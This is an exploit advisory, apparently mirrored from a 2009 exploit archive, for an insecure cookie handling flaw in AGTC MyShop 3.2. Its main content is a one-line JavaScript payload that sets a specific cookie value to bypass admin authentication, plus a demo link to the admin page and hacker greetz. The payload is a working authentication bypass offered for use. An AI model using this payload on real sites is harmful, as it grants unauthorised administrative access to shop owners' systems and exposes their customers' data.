[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AGTC MyShop 3.2 Insecure Cookie Handling Vulnerability
# Published : 2009-05-04
# Author : Mr.tro0oqy
# Previous Title : Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit
# Next Title : BluSky CMS (news_id) Remote SQL Injection Vulnerability
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : AGTC MyShop v3.2b
[+] Site :www.websiteforsaleuk.co.uk
[+] Found by : Mr.tro0oqy
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
Exploit:
--------
javascript:document.cookie="log_accept=correcto;path=/";
Demo :
------
http://www.websiteforsaleuk.co.uk/demo/admin.php
=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
ThE g0bL!N - spyboy - red virus - virus_hima
all my Friends
# www.Syue.com [2009-05-04]